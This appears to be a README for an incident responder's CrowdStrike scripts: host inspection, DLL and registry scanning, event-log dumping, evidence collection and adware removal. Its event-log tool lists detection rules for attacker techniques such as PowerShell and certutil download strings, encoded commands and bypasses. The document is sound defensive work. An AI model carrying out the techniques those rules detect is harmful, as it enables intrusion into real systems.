Since 2021, I have developed a number of scripts to assist me with my investigations and remediation efforts. I figured, why not share them to the public, in hopes it helps you.
The scripts I developed are intended to work with Crowdstrike Endpoint Detection and Response (EDR). Essentially cloud scripts to quickly remediate devices remotely with a single click of a button.
The purpose of my scripts is to assist a SOC or Incident Response Analyst with their investigation. Some scripts assist with remediation of a particular unwanted software/adware. Other scripts assist with investigating a particular system by username to provide more visibility.
- WinInspect - WinInspect is a light-weight tool to assist an analyst with providing more visibility into a Windows system based on a target username.
- MACInspect - MACInspect is a light-weight tool to assist an analyst with providing more visibility into a MAC system based on a target username.
- LinInspect - LinInspect is a light-weight tool to assist an analyst with providing more visibility into a Linux system based on a target username.
- EnumChromeExt - EnumChromeExt retrieves Chrome Extensions and automatically attempts to detect the name.
- Win-PortScanner - Win-PortScanner is an extremely light port scanner.
- ScanDll - ScanDll is tool to help search processes for a particular dynamic-link library.
- ScanDllv2 - ScanDllv2 is a tool designed to search processes for a specific dynamic-link library using C#. It's much faster than ScanDll, but the output is written to a log file due to issues with standard output display on the CrowdStrike RTR UI.
- RegScanner - An amazingly fast tool designed to search for a registry key or value using a unique keyword.
- UnloadDll - Another amazingly fast tool designed to search for a dynamic-link library loaded in the memory of the process and attempts to unload it using FreeLibrary.
- Win-DiskImage-Toolkit - A simple tool to quickly enumerate or unmount a disk image.
- ScreenConnect-C2Extractor - ScreenConnect-C2Extractor retrieves the C2 from the
user.configof ScreenConnect aka ConnectWise Client. - Win-PacketCapture - A guided script to generate a packet dump for analysis.
- jsonspection - JSONSpection is a utility designed to thoroughly inspect and enumerate JSON data structures. It helps you break down complex or nested JSON blobs, identify all key-value paths, and understand the overall schema and relationships within the data. This makes it useful for debugging APIs, analyzing logs, or preparing data for parsing and automation workflows.
- EvidenceCollection - This script collects common user document types—such as Word files, Excel spreadsheets, text files, PDFs, and emails—from a specified user’s Downloads, Documents, and Desktop directories. It automatically creates the C:\temp\SIRT directory (if it does not already exist) and copies all matching files into that location for centralized review, evidence preservation, or incident investigation. The file types, directories, and username can be customized to fit the needs of the case.
- Win-DmpEventLogs - Win-DmpEventLogs is an extremely useful forensic tool that allows you to dump Windows Event Logs within a specified time range:
1 = last 24 hours, 7 = last week, 30 = last month, 0 = all events.. Basic rules have been implemented to assist in identification.
Process Execution Rules (Event ID 4688)
Net.exe Execution - General net.exe usage
Net User/Group - Net user/group commands
Net Share - Net share/use commands
Whoami Execution - Whoami command execution
Systeminfo Execution - Systeminfo command
Tasklist Execution - Tasklist command
Nslookup Execution - Nslookup command
Ping Sweep - Ping with -n or -t flags
PowerShell Encoded - PowerShell with encoded commands
PowerShell Bypass - PowerShell bypass techniques
PowerShell Download - PowerShell download strings
Certutil Download - Certutil used for downloads
BITSAdmin Download - BITSAdmin transfer/download
WMIC Process - WMIC process execution
Scheduled Task - Scheduled task creation/execution
Registry Modification - Registry add/delete operations
Service Creation - Service creation/start
Authentication & Access Rules
Network Logon - Network logon (LogonType 3)
Failed Admin Logon - Failed logon to Administrator account
Explicit Credential Use - Event ID 4648
Privilege Escalation - Event ID 4672
Account Management Rules
User Account Created - Event ID 4720
Group Member Added - Event ID 4728
System Configuration Rules
Service Installation - Event ID 4697
Service Modified - Event ID 7045 (System log)
Driver Load - Event ID 219 (System log)
Audit Policy Change - Event ID 4719
Network Share Added - Event ID 5142
WFP Blocked - Windows Filtering Platform blocked connection (Event ID 5157)
- CSSession - CSSession is a CrowdStrike API script that allows you to connect via Real-Time-Response by entering a target hostname as an argument. You must have the appropriate api permissions and ensure your clientid / secret is correct to use this script.
- CrowdStrike-API-queued-script - CrowdStrike API Queued script allows you to queue a cloud script of your choice to a target host. You must have the appropriate api permissions and clientid / secret is correct to use this script.
The following library contains a collection of remediation scripts designed to remove common unwanted software, adware, and malware found in the wild. If you come across a particular program you’d like to remediate, feel free to download the corresponding script and use it in your environment.
- 123Movies
- 39bar
- AceLauncher
- AppMaster
- AppRun
- AskPartnerNetwork
- Ask Toolbar
- BBSK(SecureBrowser)
- Bloom
- BrightTramp
- BrowserAssistant
- ByteFence
- Calendaromatic
- Cash
- Clearbar
- Convertmate
- CrystalPDF
- DSOne Agent
- DebuggerStepperBoundaryAttribute
- DriverSupportAOsvc
- DriverTonic
- Easy2Convert
- Editor
- ElevenClock
- Energy
- Epibrowser
- Framework
- Gallery
- GameCenter
- GamerHash
- Headlines
- Healthy
- IBuddy
- LiteBrowser
- Music
- OneBrowser
- OneLaunch
- OneStart
- Ouroborosbrowser
- PCAcceleratePro
- PCAppStore
- PCHelpSoftDriverUpdater
- PC_Cleaner
- PDFArchitect
- PDFMaker
- PDFProSuite
- PDFSpark
- PDFTool
- PDFast
- PDFunk
- Player
- PowerDoc
- Prime
- RecipeListener
- ReimageProtector
- RemotePC
- Restoro
- ShiftBrowser
- Sleuth
- SlimCleaner
- Sogou
- Strength
- Taskbarsystem
- Tone
- Walliant
- WaveBrowser
- WebDiscoverBrowser
- Wellness
- XMRig
- flbmusic
- leading
- streaming
- streamlink-twitch-gui
Do you find my work helpful and want to show your support? Feel free to add me on Twitter. If you'd like to show even more support, you can also tip me at Ko-Fi. There's absolutely no pressure to do so; I appreciate your support either way!
If you would like to contribute by providing your own remediation script, it would be greatly appreciated. Any help in keeping the public safe is highly valued. Please ensure that the code is clear and concise to ensure a smooth review and validation process. Submissions can be sent as an issue. The owner's name will be associated with the remediation script.
Any issues with a script, please feel free to report it as an issue.
